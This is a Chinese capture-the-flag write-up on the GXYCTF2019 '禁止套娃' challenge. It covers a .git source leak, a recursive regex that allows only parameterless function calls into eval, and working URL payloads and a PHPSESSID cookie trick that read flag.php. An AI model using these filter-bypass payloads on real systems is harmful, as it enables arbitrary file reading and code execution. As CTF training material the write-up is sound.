[GXYCTF2019]禁止套娃(无参数RCE)
目录
信息收集
拿到这道题,抓包看了看,啥也没有,用dirsearch爆破目录发现.git目录,猜测存在.git源码泄露,用githack探测发现有index.php这个文件,原来是./git源码泄露
githack探测后拿到index.php
源码如下
";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); }}// highlight_file(__FILE__);?>知识讲解
涉及函数
PHP中preg_match(/{1\2\3...}/i,{})
preg_match 函数用于执行一个正则表达式匹配
/u 表示按unicode(utf-8)匹配(主要针对多字节比如汉字)
/i 表示不区分大小写(如果表达式里面有a,那么A也是匹配对象)
/s 表示将字符串视为单行来匹配
PHP preg_replace() 函数
preg_replace 函数执行一个正则表达式的搜索和替换。
PHP的正则表达式
无参rce
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])){ eval($_GET['code']);}
这段代码的核心就是只允许函数而不允许函数中的参数,就是说传进去的值是一个字符串接一个
(),那么这个字符串就会被替换为空,如果替换后只剩下;,那么这段代码就会被eval执行。而且因为这个正则表达式是递归调用的,所以说像a(b(c()));第一次匹配后就还剩下
a(b());,第二次匹配后就还剩a();,第三次匹配后就还剩;了,所以说这一串a(b(c())),就会被eval执行,但相反,像a(b('111'));这种存在参数的就不行,因为无论正则匹配多少次它的参数总是存在的。那假如遇到这种情况,我们就只能使用没有参数的php函数
这里如果觉得比较抽象我们可以本地搭建个匹配进行验证分析,如下
当a_存在参数时echo不执行,另外由于没有匹配数字,出现数字也会不执行,如'b(a1_());'
用到的函数
localeconv() 返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值
scandir() 可以扫描当前目录下的文件
array_reverse() 以相反的元素顺序返回数组
next() 将内部指针指向数组的下一个元素,并返回结果current(localeconv())永远都是个点
思路分析
方法一
先读取当前的目录
?exp=print_r(scandir(current(localeconv())));
发现一个flag.php
目录取反
?exp=print_r(array_reverse(scandir(current(localeconv()))));
指向下一个元素
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
读取文件
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
方法二
session_id()实现任意文件读取
session_id可以获取PHPSESSID的值,而我们知道PHPSESSID允许字母和数字出现,而flag.php符合条件
因此我们在请求包中cookie:PHPSESSID=flag.php,使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。
session_id()可以获取到当前的session id。
这样可以构造payload:?exp=readfile(session_id(session_start()));
达到任意文件读取的效果
先用cookie传参来设置session_id的值,session_id的值等于cookie中PHPSESSID的值,所以构建cookie头
Cookie: PHPSESSID=flag.php
在PHP中,session通常不会手动开启,需要利用php函数session_start来开启,所以可以构造payload
?exp=show_source(session_id(session_start()));
来源地址:https://blog.csdn.net/qq_63701832/article/details/128730383
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
